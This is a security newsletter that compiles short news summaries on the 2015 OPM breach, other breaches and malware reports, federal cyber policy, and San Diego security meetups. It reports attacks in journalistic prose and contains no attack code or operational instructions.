Welcome to Cyber News Tidbits 4​U​ !

Here are updated news compilations from the Cyber Security Community

Topic headers (+++):

1 – Security news you can likely use (re: management / opportunity items)

2 – Other items of general FYI / FYSA level interest

3 – Threats / bad news stuff / etc.. 


4 – SD/SoCAL items of interest / opportunities   (send me your SD meetings!) 

A couple of Highlights  (A couple of items of potentially notable interest / high utility &  value… your mileage will vary….)

(Lots happening,  so LOTs to be aware of. Takes 5 min to skim…then pick out a topic or two..)

 ( some great topics / meetings here in SD … scroll to bottom and get engaged)

June 24

Of course this is still news

+++ OPM hack – 4 – 19 million records exposed, SF86 too – for sale on Darknet.

“EPIC” fail – How OPM hackers tapped the mother lode of espionage data

Government officials have been vague in their testimony about the data breaches-there was apparently more than one-at the Office of Personnel Management. But on Thursday, officials from OPM, the Department of Homeland Security, and the Department of the Interior revealed new information that indicates at least two separate systems were compromised by attackers within OPM’s and Interior’s networks. The first was the Electronic Official Personnel Folder (eOPF) system, an entity hosted for OPM at the Department of the Interior’s shared service data center. The second was the central database behind EPIC, the suite of software used by OPM’s Federal Investigative Service in order to collect data for government employee and contractor background investigations.


+ Officials: Chinese had access to U.S. security clearance data for one year

The recently disclosed breach of the Office of Personnel Management’s security-clearance computer system took place a year ago, giving Chinese government intruders access to sensitive data for a year, according to new information. The considerable lag time between breach and discovery means that the adversary had more time to pull off a cyber-heist of consequence, said Stewart Baker, a former National Security Agency general counsel. “The longer you have to exfiltrate the data, the more you can take,” he said. “If you’ve got a year to map the network, to look at the file structures, to consult with experts and then go in and pack up stuff, you’re not going to miss the most valuable files.”

+++  OUR LinkedIn post on the top ten basic security tasks to DO for OPM /YOU =  targeted cyber basics


+ Attack gave Chinese hackers privileged access to U.S. systems

For more than five years, American intelligence agencies followed several groups of Chinese hackers who were systematically draining information from defense contractors, energy firms and electronics makers, their targets shifting to fit Beijing’s latest economic priorities. But last summer, officials lost the trail as some of the hackers changed focus again, burrowing deep into United States government computer systems that contain vast troves of personnel data, according to American officials briefed on a federal investigation into the attack and private security experts.


+ Navy challenged by spear phishing, software patches

Of the myriad cybersecurity challenges facing the Navy, two stand out: spear phishing and more swiftly deploying software patches. That was the gist of a June 18 update on Navy defensive cyber operations given by Capt. David Bondura, U.S. Fleet Cyber Command’s assistant chief of staff for operations. Spear phishing, when hackers send malicious emails to a select group of people, is “our biggest problem right now,” Bondura said at an AFCEA conference in Baltimore. “Every single sailor on board any ship still poses a potential risk to that network” when they establish a secure socket layer (SSL) connection to an outside website by, for example, checking Facebook, Bondura said. “Once that SSL connection is established, we cannot see – that whole DOD architecture that’s built there – cannot see what’s coming down that encrypted pipe.”


+ Cyber warfare overshadows ‘netwar’ concept putting US at risk,

While many government officials are focused on cyberwarfare following a spate of high-profile cyberattacks including the recent Office of Personnel Management data breach allegedly by Chinese hackers, a new paper states that another concept called “netwar” – a psychological force that’s increasingly related to cyber – deserves more attention. The paper, released June 11 by the Office of the Director of National Intelligence, defines netwar as “intentional activities [meant] to influence the domain of human perception via either overt or hidden channels, in which one or more actors seeks to impose a desired change upon the perception of another actor, in order that this change facilitate second-and third order effects of benefit to them.”


+  ‘digitization of everything’ will help enhance cybersecurity across government

The federal government’s top technology official / CIO said June 15 that “the digitization of everything” will help accelerate a new technological model that infuses cybersecurity as a core component. “This digitization is relentless and it won’t stop and it’s accelerating and it’s changing everything, including government,” Tony Scott, the federal chief information officer, told government employees during his keynote at the inaugural CIO Council IT Symposium in Washington, D.C. “We’re going to see more change in the next three or four or five years as the technology industry responds to today’s challenges and figures out new architectural models and paradigms for the future,” he added.


+ DISA five-year plan treats cyber as warring domain

The Defense Information Systems Agency has released a five-year strategy that calls on Defense Department personnel to treat cyberspace like a war-fighting domain by enabling maneuvering on DOD networks.   “We will execute synchronized [DOD information network] command, operations and cyber defense missions to ensure freedom of maneuver for the war-fighter and mission partners,” the document states. “We’re waking up to realizing that there is a lot more that needs to be protected, there [are] a lot of better ways that we need to protect” DOD assets, said DISA Director Lt. Gen. Ronnie Hawkins.


+ Medical-device, IoT hacks spurring security software boom

The same hospital computer networks that have helped deliver medical devices to U.S. patients are now making them more vulnerable to cyberattacks. Malware intrusions are on the rise among such systems, says Greg Enriquez, CEO of TrapX, which tracks them as part of its effort to build software that tricks such evil code into revealing itself. This battle is growing, he says, because such data is often on older, more-vulnerable networks, while the financial incentives for stealing medical data increase.


+ Data breaches from nowhere – Most compromises still being discovered by third parties

The majority of data breaches are still being detected by sources outside the affected organisations, security firm Trustwave has reported in its annual report on the topic. Most victims took around three months to uncover incidents. Altogether, Trustwave investigated 574 breaches among its customer base in during 2014. Although 15 countries were represented, the firm’s business orientation towards certain countries probably explains why half of those incidents were in the US, followed by Australia with 24 percent and the UK with 15 percent although it is also possible that these are more heavily targeted.


+ Data warehouse raises privacy concerns

A government data warehouse that stores information indefinitely on millions of customers is raising privacy concerns at a time when major breaches have become distressingly common. Known as MIDAS, the system is described on a federal website as the “perpetual central repository” for information collected under President Barack Obama’s health care law. “Data in MIDAS is maintained indefinitely at this time,” says a government privacy assessment dated Jan. 15. The information stored includes names, Social Security numbers, birthdates, addresses, phone numbers, passport numbers, employment status and financial accounts.


+ Why China Wants Your Sensitive Data

Since May 2014, the Chinese government has been amassing a ‘Facebook for human intelligence.’ Here’s what it’s doing with the info…


+ The US Navy’s warfare systems command just paid millions to stay on Windows XP

Windows XP and other obsolete systems remain critical to the Navy’s operations…(they want to outdo OPM?)


Insider threat control: Using predictive and real-time analytics

According to a new security report, fewer than half of organizations have appropriate controls to prevent insider attacks. That would be the routine controls — the standard, basic stuff one would think every company uses and has used for years…


+ Why Is Fighting Cybercrime So Hard?

It’s tough to target the few hundred super hackers that experts believe are behind the majority of cyber attacks…


+ Pentagon May Hold IT Users More Accountable for Cyber Security

DOD CIO Terry Halvorsen said that there are few if any consequences for users whose online behavior creates security problems for DOD systems. Halvorsen said that the Pentagon plans to start holding IT users and their commanders more responsible for violating cyber security rules.


+ 2015 Data Protection Maturity Report


+ 2015 Annual Security report (and summary)


+  KREBS SAYS – Stop Worrying and Embrace the Security Freeze


+ Ten essential cyber security questions to ask your CISO


+  The Future Of Cybersecurity (Info sharing)


2  +++++++

+ US to raise breach of government records at talks with China

The United States began annual security talks with China on Monday, and an official said it plans to raise directly the breach of a federal government server that resulted in the theft of personnel and security clearance records of millions of employees and contractors. China has openly denied involvement in the break-in. Obama administration officials have said they are increasingly confident that China’s government, not criminal hackers, were responsible. U.S. and Chinese officials are discussing thorny issues including cybersecurity, maritime security, military relations, missile defense, nuclear policy and space security. The discussions, led by Deputy Secretary of State Antony Blinken and his Chinese counterpart, Executive Vice Foreign Minister Zhang Yesui, involve both civilian and military officials.


+ What’s worse: Living with legacy systems or replacing them?

The recent revelation of a breach at the Office of Personnel Management, which could have resulted in the theft of personal information of millions of government employees, also points up the broader problem government has with legacy systems — whether it’s worth spending the money to secure them. Not that securing the OPM’s systems would have done much good in this case —  according to the Department of Homeland Security Assistant Secretary for Cybersecurity Andy Ozment, the systems were not directly penetrated.  Instead, attackers obtained OPM users’ network credentials and got to the systems and data from the inside.


+ OPM hack: The role FISMA played

The Office of Personnel Management data breach is merely a symptom of a much larger problem across all federal government executive branch agencies, and it’s not going away anytime soon. That’s because the Federal Information Security Management Act, in all of its various forms over the past 14 years, has created a veritable disarray of legislative mandates, ostentatious oversight, ambiguous policy frameworks, ineffective guidelines, disjointed funding, and deficient accountability. Even more significant, FISMA botched cybersecurity leadership and governance across the entire executive branch.


+ Reacting to Chinese hack, the government did not follow its own cybersecurity rules

In responding to China’s massive hack of federal personnel data, the government may have run afoul of computer security again. Over the last nine days, the Office of Personnel Management has sent e-mail notices to hundreds of thousands of federal employees to notify them of the breach and recommend that they click on a link to a private contractor’s Web site to sign up for credit monitoring and other protections. But those e-mails have been met with increasing alarm by employees – along with retirees and former employees with personal data at risk – who worry that the communications may be a form of “spear phishing” used by adversaries to penetrate sensitive government computer systems.


+ Valuing cybersecurity outcomes instead of oversight

Every day, new technologies and applications offer opportunities to change how we work, live and play. This frenetic pace is rivaled only by the ever increasing number and sophistication of the cybersecurity threats we face. We are eager to embrace the future: the Internet of Things, nanotechnology and everything from Fitbits to bring your own device. We want to be always connected, from any device, from anywhere. Yet with each new capability that we embrace, new threats and vulnerabilities are introduced.


+ Study: 15-30 percent of eCommerce site visitors infected with CSIM

Infected with client side injected malware (CSIM), according to whitepaper from Namogoo, an online security firm that monitors numerous verticals throughout the U.S. and Europe. Although legally the company can’t identify the sites it monitors, Namogoo said they are among some of the most popular travel sites. “We didn’t expect to see such an increase in the infection rate in such a short time. We were surprised about the scale of the problem and also about the variety of different types of client-side Injected Malware,” Namogoo co-founder and CEO Chemi Katz told in an email correspondence.


+ Push for facial recognition privacy standards hits roadblock

Retailers have the ability to scan your face digitally and use that identification to offer you special prices or even recognize you as a prior shoplifter. But should they use it? Should they get your permission first? Privacy advocates announced Tuesday that they had walked away from government-mediated talks with industry that were intended to answer such questions. The idea was to hash out voluntary protocols for the use of facial recognition technology in a way that would not hurt consumers. The Commerce Department’s National Telecommunications and Information Administration, or NTIA, was acting as mediator.


+ Here’s what OPM told Congress the LAST TIME hackers breached its networks

A day after representatives from a security firm who happened to be giving a sales pitch say they detected months-old malware on the Office of Personnel Management’s networks, the agency’s chief information officer, Donna Seymour, testified before Congress that OPM’s leadership and cyber defenses were effective at quickly resolving threats. The newly discovered network threat, which Seymour did not mention to lawmakers, ultimately exposed sensitive data on 4.1 million federal workers and background-check forms detailing employees with access to classified information.


+  Emoji passwords could be coming your way. Is that a good thing?

Soon, you might be able to log into your bank account with a litany of smiling poo emojis, or a string of little chicken wing images, or multiple little monkeys holding their hands over their eyes. On Monday, a UK online banking service provider called Intelligent Environments announced what they’re calling the “world’s first emoji-only passcode.” Intelligent Environments says the emoji passcode system will allow users to use codes from a bank of 44 emojis — and don’t worry, it includes that lady in the red dress salsa dancing.


+  Put up the firewalls

When it comes to Chinese hacking, Americans cannot say they were not warned. In January James Clapper, the director of national intelligence, told a technology conference in New York that “China has been robbing our industrial base blind, largely withvulnerabilities that are easy to guard against or to simply fix.” They are, he said, “cleaning us out, because we know we’re supposed to do those simple things, and yet we don’t do them.” .


+ Only Seven Percent of Malicious Mobile Applications Apparent to Users:

Data from ESET on malicious mobile applications shows that only seven percent of reported incidents on mobile applications are caused by straightforward malware…


+ The Dark Web: An Untapped Source For Threat Intelligence

Most organizations already have the tools for starting a low-cost, high-return Dark Web cyber intelligence program within their existing IT and cybersecurity teams. Here’s how…


+ Lessons from the Sony Hack: The Importance of a Data Breach Response Plan

In a decision emphasizing the need for employers to focus on data security,


+  All industries fail cybersecurity, govt the worst

Most sectors failed industry-standard security tests of their Web and mobile applications, but the government failed the worst, a report by application security company Veracode found…


+ Case Study: Critical Controls that Sony Should Have Implemented

November 24, 2014, an incident almost pulled right out of a 90’s hacker movie transformed into a massive computer hack. A group calling itself The Guardians of Peace (GOP) managed to breach Sony Pictures Entertainment


+  National Cyber Security Hall of Fame 2015 Nominations

Mike Jacobs, chair of the Cyber Security Institute of San Diego, is chair of the NCS HoFame. Mike was the first Information Assurance Director at NSA.  We have had three years of inductees into the NCS HoFame that include many of the significant contributors to Cyber Security including Rivest, Shamir, Adleman, Diffie, Hellman, etc.

There are five contribution categories for nominations: Technology, Policy, Public Awareness, Education and Business….  Soliciting publicity for nominations that aredue July 5, 2015


3  +++++++

+ Hunt for Deep Panda intensifies in trenches of U.S.-China cyberwar

Security researchers have many names for the hacking group that is one of the suspects for the cyberattack on the U.S. government’s Office of Personnel Management: PinkPanther, KungFu Kittens, Group 72 and, most famously, Deep Panda. But to Jared Myers and colleagues at cybersecurity company RSA, it is called Shell Crew, and Myers’ team is one of the few who has watched it mid-assault – and eventually repulsed it. Myers’ account of a months-long battle with the group illustrates the challenges governments and companies face in defending against hackers that researchers believe are linked to the Chinese government – a charge Beijing denies.


+ New exploit turns Samsung Galaxy phones into remote bugging devices

As many as 600 million Samsung phones may be vulnerable to attacks that allow hackers to surreptitiously monitor the camera and microphone, read incoming and outgoing text messages, and install malicious apps, a security researcher said. The vulnerability is in the update mechanism for a Samsung-customized version of SwiftKey, available on the Samsung Galaxy S6, S5, and several other Galaxy models. When downloading updates, the Samsung devices don’t encrypt the executable file, making it possible for attackers in a position to modify upstream traffic-such as those on the same Wi-Fi network-to replace the legitimate file with a malicious payload. The exploit was demonstrated Tuesday at the Blackhat security conference in London by Ryan Welton, a researcher with security firm NowSecure.


+ Major Mac flaw spills your passwords

Apple claims that its “Keychain” software lets people securely store their passwords on their Macs. As it turns out, hackers can pull the keys off the chain. A crucial flaw found in Macs allows a malicious app to snatch the passwords from your Keychain — or even directly from other apps. That exposes the passwords to your iCloud account, notes, photos, email, banking, social media — everything. Indiana University computer science professor XiaoFeng Wang and his team of researchers found several ways a bad app could “cross over” into other apps. The researchers found that malicious software could slip into the Apple Keychain, delete old passwords, and wait for you to retype them in. When you do, it grabs them.


+ Hack of cloud-based LastPass exposes hashed master passwords

LastPass officials warned Monday that attackers have compromised servers that run the company’s password management service and made off with cryptographically protected passwords and other sensitive user data. It was the second breach notification regarding the service in the past four years In all, the unknown attackers obtained hashed user passwords, cryptographic salts, password reminders, and e-mail addresses, LastPass CEO Joe Siegrist wrote in a blog post. It emphasized that there was no evidence the attackers were able to open cryptographically locked user vaults where plain-text passwords are stored. That’s because the master passwords that unlock those vaults were protected using an extremely slow hashing mechanism that requires large amounts of computing power to work.


+ 44.5 million new malware variants recorded in 1 month

A freshly released report from Symantec about the state of malware risks identified in the month of May informs that cybercriminals were highly active, creating no less than 44.5 million new versions of threats. The figure sets a new high this year and it represents an increase of more than 50% compared to the previous month, when the company’s system recorded 29.2 million new threats. The time interval with the second largest number of malicious software seen by Symantec systems is March, the total amount reaching 35.8 million samples.


+ China and Russia almost definitely have the Snowden docs

Last weekend, the Sunday Times published a front-page story, citing anonymous British sources claiming that both China and Russia have copies of the Snowden documents. It’s a terrible article, filled with factual inaccuracies and unsubstantiated claims about both Snowden’s actions and the damage caused by his disclosure, and others have thoroughly refuted the story. I want to focus on the actual question: Do countries like China and Russia have copies of the Snowden documents I believe the answer is certainly yes, but that it’s almost certainly not Snowden’s fault.


+ Polish LOT airplanes grounded by computer hack

Some flights operated by Poland’s national airline, LOT, were grounded on Sunday after hackers attacked its computer system. The hacking attack targeted computers issuing flight plans at Warsaw’s Okecie airport. More than 1,400 passengers were affected, with 10 flights cancelled and another 12 delayed. Services were getting back to normal on Sunday evening. The attack is now being investigated by airline authorities. Flights to Dusseldorf, Hamburg and Copenhagen and Polish cities were affected, although LOT stressed that the glitch did not affect the airport or airplanes that were already in the air.

–Vulnerable Flight Plan Protocol Widely Used

The flight plan delivery protocol is used by virtually every airline. It does not require authentication. Earlier this month, United Airlines flights in the US were grounded for an hour; the airline did not offer many details, but the issue was reportedly with incorrect flight plans being sent to pilots.


+ Stegoloader malware hides in images on legit sites

Security researchers have warned that a little-known malware family could spell a new trend emerging in the ongoing cybersecurity arms race: the use of digital steganography to hide malicious code. Dell SecureWorks revealed its findings in a new report, Stegoloader: A Stealthy Information Stealer. It details a malware family first identified in 2013, although little discussed in the white hat community. The malware has been architected with several key features designed to make analysis and detection incredibly difficult – key among these being that it only deploys the modules it needs one by one, limiting exposure to investigators.


+  Even with a VPN, open Wi-Fi exposes users

By now, any sentient IT person knows the perils of open Wi-Fi. Those free connections in cafes and hotels don’t encrypt network traffic, so others on the network can read your traffic and possibly hijack your sessions. But one of the main solutions to this problem has a hole in it that isn’t widely appreciated. Large sites like Twitter and Google have adopted SSL broadly in order to protect users on such networks. But for broader protection, many people use a virtual private network (VPN). Most people, if they use a VPN at all, use a corporate one. But there are public services as well, such as F-Secure’s Freedome and Privax’s HideMyAss. Your device connects with the VPN service’s servers and establishes an encrypted tunnel for all your Internet traffic from the device to their servers. The service then proxies all your traffic to and from its destination.


+ Samsung and LG smartwatches leave sensitive data open to hackers

Hackers can easily swipe personal data from LG and Samsung smartwatches, researchers have revealed, with neither brand encrypting sensitive data. According to researchers at the University of New Haven, hackers can easily extract personal data, including contacts, messages and health information, from both the Samsung Gear 2 and LG G Watch. Ibrahim Baggili of the University of New Haven’s Cyber Forensics Research and Education Group, said: “It was not very difficult to get the data, but expertise and research was required.” The researchers, who are currently looking into whether the Apple Watch suffers a similar issue, said they were able to easily swipe data from both the Tizen and Android Wear-powered watches by poking around the wearables’ internal storage and the smartphone to which they were linked.


+ Chinese hackers circumvent popular web privacy tools

a way around widely used privacy technology to target the creators and readers of web content that state censors have deemed hostile, according to new research. The hackers were able to circumvent two of the most trusted privacy tools on the Internet: virtual private networks, or VPNs, and Tor, the anonymity software that masks a computer’s true whereabouts by routing its Internet connection through various points around the globe, according to findings by Jaime Blasco, a security researcher at AlienVault, a Silicon Valley security company.


+ Criminals Continue to Defraud and Extort Funds from Victims

Using Cryptowall Ransomware Schemes Data from the FBI’s Internet Crime Complaint Center (IC3) shows ransomware continues to spread and is infecting devices around the globe…


+ Just How Dark Is The ‘Deep Web’?

A new report has attempted to shed some light on the kinds of illegal and immoral activities carried out on the deep web, an area off limits to the majority of Internet users…


+ US Hosts The Most Botnet Servers

More malicious command and control servers are based in the US than anywhere else,and China is home to the most bots.


+  Verizon, AT&T, WhatsApp rank low in data privacy report


+++  SD/SoCAL security events / opportunities +++

+ CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!! 

Join their Meetup Group for the latest event information!  The definition of“Cyber KEWEL


25  – ISSA – (  11:30AM).    “HealthCare CISO panel”     (at ADM Baker field clubhouse )


9 SD ISC2  (Thur at 6PM) –  “SD CityCISO – 2 years and counting – lessons learned”  Gary Hayslip

Location – BAH (Suite 200)  4055 Hancock Street, San Diego, CA 92110 USA

16 – OWASP –  6PM –  Peter Bartoli is the VP of Operations at M5 Hosting and an adjunct professor at San Diego State University in the Computer


Global  Cyber events:


June 15   (TWO weeks worth again…)

1  +++++++

Of course this is still news

+++ OPM hack – 4 – 19 million records exposed, already for sale on Darknet.

Union: Hackers have personnel data on every federal employee Hackers stole personnel data and Social Security numbers for every federal employee, a government worker union said Thursday, asserting that the cyber theft of U.S. employee information was more damaging than the Obama administration has acknowledged. the December hack into Office of Personnel Management data was carried out by “the Chinese”

And a DHS spokesperson told Ars that “interagency partners” were helping the OPM improve its network monitoring “through which OPM detected new malicious activity affecting its information technology systems and data in April 2015.” Those statements may not be entirely accurate…. A product demo looks to have found the hack,,,

China hackers got past costly U.S. computer security with ease The hackers sneaked past a sophisticated counter-hacking system called Einstein 3, a highly-touted, multimillion-dollar and mostly secret technology that’s been years in the making. It’s also, by the government’s own admission, already obsolete.

AND this.. 

White house orders government to do four basic security items (and one was NOT encryption???


+++  OUR LinkedIn post on the top ten basic security tasks to DO for OPM / YOU =  targeted cyber basics



+ When regulating apps, smart cities need to be smart about privacy

Cities across the country are using data to more effectively and efficiently provide services for citizens. New York City, under the last several mayors, has been at the forefront of analyzing information from across the city to tackle problems ranging from public safety to the environment. Smart cities bring together cutting-edge monitoring, big data analysis and innovative management technologies to the world of urban planning, but all of these data in government hands raise important privacy issues. Basic caution is warranted with regards to law enforcement access and public release of this information, either through data breaches or Freedom of Information laws.



+ Government malware spied on cybersecurity company, possibly Iran nuclear talks

A successor to Stuxnet, the sophisticated piece of malware that infected Iran’s nuclear centrifuges around 2010, managed to infiltrate one of the most high-profile cybersecurity groups. Today, Kaspersky Labs published a postmortem on what it calls Duqu 2.0, a derivative of the Duqu program it investigated in 2011; Kaspersky has previously tied Duqu to Stuxnet. “The thinking behind it is a generation ahead of anything we’d seen earlier — it uses a number of tricks that make it really difficult to detect and neutralize,”



+ Here’s what you can do to secure your network as the Internet of Everything nears

The Internet of Everything, the intersection and connection of people, processes, data, and things, holds great promise for creating greater operational efficiencies within government entities. It has the potential to help with everything from traffic jams to safety in public parks. Cisco predicts that by the year 2020, 50 billion devices will be Internet connected. As government agencies continue to bring more and more devices from disparate suppliers into their network, cybersecurity models need to radically change.



+ Agencies spend big on cloud this year

Federal agencies are expected to spend at least $400 million more on cloud computing this year than last. The expected bump would bring the year’s total cloud computing spending to $2 billion and illustrates the heightened attention the federal government is paying to the cloud,



+ SpaceX founder files with government to provide Internet service from space

Elon Musk’s space company has asked the federal government for permission to begin testing on an ambitious project to beam Internet service from space, a significant step forward for an initiative that could create another major competitor to Comcast, AT&T and other telecom companies.



+ Sidewalk Labs, a start-up created by Google, has bold aims to improve city living

Now Google is getting into the ultimate manifestation of the messy real world: cities. The Silicon Valley giant is starting and funding an independent company dedicated to coming up with new technologies to improve urban life. The start-up, Sidewalk Labs, will be headed by Daniel L. Doctoroff, former deputy mayor of New York City for economic development and former chief executive of Bloomberg L.P.



+ Microsoft opens EU ‘Transparency Centre’ to allay fears over NSA backdoors

in Brussels, its second after launching the first in Redmond just under a year ago. According to the company, the new centre “offers participating governmental agencies the opportunity to review the source code of Microsoft products, access information on cybersecurity threats and vulnerabilities,



+ Wall Street watchdog sets rules for bitcoin

A top Wall Street watchdog on Wednesday issued new rules that place stricter cybersecurity requirements on financial firms wishing to use virtual currencies.  “Building trust and confidence among consumers is crucial for wider adoption. It also helps attract additional investment.”



+ NIST releases draft framework to help agencies understand, manage privacy issues

The National Institute of Standards and Technology last week released a draft guide aimed at helping federal agencies anticipate and address privacy risks from collecting and processing personal data through their computer networks. NIST Internal Report 8062, called “Privacy Risk Management for Federal Information Systems,



+More bosses expected to track their staff through wearables in the next 5 years

Last year insurance company USAA banned its employees from wearing Google Glass to work. The problem wasn’t the geeky look they gave their staff, but the potential privacy risk they posed on other colleagues and customers.



+ Security Defenses Are No Match for Cyber-Crooks

Organizations are falling behind the security curve, and security defenses that were at least somewhat effective a decade ago no longer cut it… Privacy Rights Clearinghouse, 49 major public breaches representing 80,319,845 records have already taken place in 2015



+ Why the Internet of Things isn’t the same as the new hardware movement

Cheap, accessible, open hardware is driving the IoT… So, hardware can be deployed in all sorts of ways that it couldn’t before, and at much lower cost. That means computing can extend into many places where it couldn’t before — like cornfields and streetlights.



+ Growing cyber threats challenging cost reduction as reason to use managed services

Mid-sized companies plan to use more managed services and many see it as improving security…



+ Raytheon Rethinks Cyber, Trademarks C5I Concept

The defense industry loves acronyms, but it’s rare that one given to a trade space is trademarked. Yet by adding “cyber” to the widely used C4I (command, control, communications, computers and intelligence), Raytheon has taken that step with C5I…



+ Companies Should Heed DOJ’s New Cybersecurity Guidance to Minimize Liability

The Department of Justice (DOJ) has released new guidance on cyber preparedness and incident response, becoming the latest federal agency to do so in recent months…



+ 20 Top Security Influencers

It can be tough to know where to go for the latest enterprise security news and actionable advice. This list of influencers is a great place to start…



+ Survival Tips For The Security Skills Shortage

No matter how you slice it, creating a security professional with 10 years of experience takes, well, 10 years. Here are six suggestions for doing more with less…



+ Duqu 2.0 Attack On Kaspersky Lab Opens Chilling New Chapter In Cyber Espionage

New nation-state campaign with previous ties to Stuxnet spies on security firm’s research and anti-cyber spying technologies — plus participants in Iranian nuclear negotiations and their telecommunications, mobile providers…



+ RAND study: Cyber-defense must change course, or else

RAND today released the results of its multiphased study on cybersecurity’s future, The Defender’s Dilemma, delivering a frightening snapshot of defenders lost at sea…  (162 pages of solid cyber sense…)



+ 8 Surprising Facts About the Rise of the Dark Net

One of the truly indispensable works of nonfiction released in 2015, Jamie Bartlett’s The Dark Net charts the rise of the anonymous Internet — the “dark net” — and its many appendages…



+ 10 highest-paying IT security jobs

High-profile security breaches, data loss and the need for companies to safeguard themselves against attacks is driving salaries for IT security specialists through the roof. Here are the 10 highest-paying security roles



+ Insider Threat Report 2015



+ Definitive Guide To Cloud Access Security Brokers (CASBs)  (requires browser plug in)



+ SIEM guide



+ The Calm Before the Mobile API Data Breach Storm?



+ IEEE May/June Security and Privacy Magazine





2  +++++++



+ After OPM debacle, three-step biometric ID checks are coming

Expect computers to require that federal personnel use a smartcard, a password, and their fingerprints before logging on, as a way to shore up defenses in the wake of a massive government cyber assault, a top official at the Department of Homeland Security said this week. So-called three-factor authentication goes one step further than today’s government-wide sign-on routine, which involves only a badge and PIN, if that. Most agencies, including the recently hacked Office of Personnel Management, only require a PIN. Foreign spies, who allegedly extracted details on millions of current and former federal employees from OPM’s network, might change that.



+ Senate rejects measure to strengthen cybersecurity

On the heels of a vast breach of the personal information of federal employees, the Senate failed Thursday to advance a cybersecurity measure, the third time in three years that a bipartisan effort to tackle the problem has fallen victim to procedural actions. The measure, which failed, 40 to 56, was similar to an expansive bill passed by the House two months ago that would push companies to share access to their computer networks and records with federal investigators. Senator Mitch McConnell, Republican of Kentucky and the majority leader, attached the cybersecurity measure to a larger defense policy bill, hoping its complexity and broad bipartisan support would counter President Obama’s threat to veto that measure. Democrats objected to the move and voted against the cybersecurity measure as a result.



+ EU, US officials close in on broad privacy accords

After years of thorny negotiations, top EU and U.S. officials say they are close to agreement on two privacy accords that would regulate the transfer of personal data of European citizens to the U.S. At stake is the ability of U.S. and European companies and governments to share data about private citizens for commercial and law enforcement purposes. A version of one of the two privacy deals being discussed, the Safe Harbor accord, has been in force for years but is being renegotiated. Failure to reach agreement on how to change the accord would spell serious trouble for companies like Google, Facebook and Twitter, which have relied on it to transmit data on EU citizens to the U.S. for processing and storage.



+ Big data systems house sensitive data, security exposures

Big data systems are invading enterprise data centers at a rapid rate, but they often lack the controlled access, data encryption, and other protections inherent in relational systems, according to a SANS Institute survey of 206 companies. Of the respondents, 43% were from organizations with 10,000 or more employees and 53% held a title related to IT security. Big data systems increasingly serve as the repository for personal-identification information and corporate intellectual property. For example, the SANS survey found 73% of respondents with big data applications “use them to store personal data on customers and 72% store important business data,” such as employee records (64%), intellectual property (59%), and payment card information (53%).



+ FCC Open Internet rules are finally here. So what’s changed?

The Federal Communications Commission’s long-awaited rules to ensure Internet openness take effect today. Whether you’re a casual Web user or a so-called “cord cutter” who’s ditched pay-TV service in favor of streaming sites like Netflix and Hulu, here’s how the regulations might affect you. Under the FCC rules, companies providing you a broadband Internet access service — whether it’s cable in your home or 4G on your phone — must treat all traffic traveling over the Web equally. They can’t block your lawful content or slow your connection to keep you from using particular services, apps or devices. They also can’t favor their own content ahead of others’ or create fast lanes for a fee.

+ Funding bill would block net neutrality until courts rule A House appropriations bill released Wednesday would block the Federal Communication Commission from implementing its net neutrality rules until the courts weigh in on the issue.



+ How did Estonia become a global leader in digital government?

Quick, think of the most digital-friendly government in the world? If Estonia’s didn’t immediately pop into your head, then listen up. The tiny European nation was the first country to permit online voting more than a decade ago, and it has consistently led the way in digital signatures and online transactions. But Estonia didn’t become a global leader of e-governance because the country is some sort of “digital Narnia,” says Andres Kutt, the architect and adviser to the Estonian Information Security Authority. The country’s tech transformation was born out of necessity, he says.



+ SANS whitepaper, based on its 2015 State of Application Security Survey,

to find out: the top security challenges faced by both the builders and defenders of software; how these challenges are made more complicated by the rapidly accelerating pace of development and lack of control over applications hosted in the cloud; the progress, and the setbacks, occurring in the effort to align developers and security professionals; best-practice advice for secure development and delivery of applications throughout the software development lifecycle.



+ NASA and Verizon plan to monitor US drone network from phone towers

Verizon signed an agreement last year with NASA “to jointly explore whether cell towers … could support communications and surveillance of unmanned aerial systems (UAS) at low altitudes”. That $500,000 project is now underway at NASA’s Ames Research Center in the heart of Silicon Valley.



+ Building effective cybersecurity teams at all levels

Cybersecurity is becoming an increasingly common topic of conversation across the public sector, and for good reason.



+ The U.S. government is mandating the use of the HTTPS

security protocol on all of its public websites and web services by the end of 2016. Deploying HTTPS will authenticate communications with government websites and encrypt the data sent back and forth, which will help protect against snooping and imposter websites..



+ Your finger is about to replace your bank password

We already use our fingerprint to unlock our phones, and one day soon your finger could replace your bank password. Over the past year, U.S. banks have been ramping up efforts to incorporate biometric technology (iris scanners, fingerprint readers and facial recognition) into their systems.



+ Facebook is finally embracing consumers’ desire to encrypt their emails.

The company announced today that people will now be able to share encryption keys via their Facebook profiles. They can also have the company encrypt the emails it sends them whenever they receive a notification on the social network. In a blog post, Facebook explains that it already encrypts notification emails as they’re ferried along the network.



+ New privacy app takes a page from NSA technology

smartphone application called Scrambl3 from a California startup which claims its “dark Internet tunnel” thwarts snooping on voice calls and messages. Scrambl3 was launched as a stand-alone app for Android devices by the startup, USMobile, which describes it as a way to create “trusted connections on untrusted networks.”



+ U.S. to bring Japan under its cyber defense umbrella

The United States will extend its cyber defense umbrella over Japan, helping its Asian ally cope with the growing threat of online attacks against military bases and infrastructure such as power grids, the two nations said in a joint statement



+ Lawmakers to automakers: How are you protecting cars from cyberattacks?

Ten members of the House of Energy and Commerce Committee are questioning how the government and auto-makers are prepping for the potential cybersecurity risks of reliance on software in vehicles.



+ Most Security Depts Blindly Trust Certificates and Keys

Most IT security professionals acknowledge they don’t know how to detect or remediate quickly from compromised cryptographic keys and digital certificates…



+ Offended by Offensive Security

The commonly held belief in the realm of digital security (cyber security for the new folks and media) is the methods employed are strictly defensive in nature…



+ How Employee Negligence Can Put Your Company’s Data At Risk

Cyber Liability Insurance is a coverage that many businesses have overlooked in the hopes of keeping costs down in tough market conditions…



+ What is Cyber Insurance?

You may have heard the term “Cyber Insurance” in exceptionally glowing terms, describing it as the next big thing that no sensible business should be without. Or you may also have heard it described as something that is greatly hyped but which is not quite as awesome as all that.



+ 90% of DLP violations occur in cloud storage apps

violations occur in cloud storage apps, and a large percentage of these are for enterprise confidential intellectual property or customer or regulated data that the customer did not know or want to store there…



+ The Rise Of Bring Your Own Encryption

The BYOE security model gives cloud customers complete control over the encryption of their data. At the same time, cloud providers are finding innovative ways to let users manage encryption keys…



+ BYOD advice

Five experts offer advice on managing risks when agency employees bring their own mobile devices to work



+ Cybersecurity Maturity Lacking or Non-Existent for Most



+ NIST outlines process for vetting mobile apps



+ “Top 10″ List for Security Law Compliance



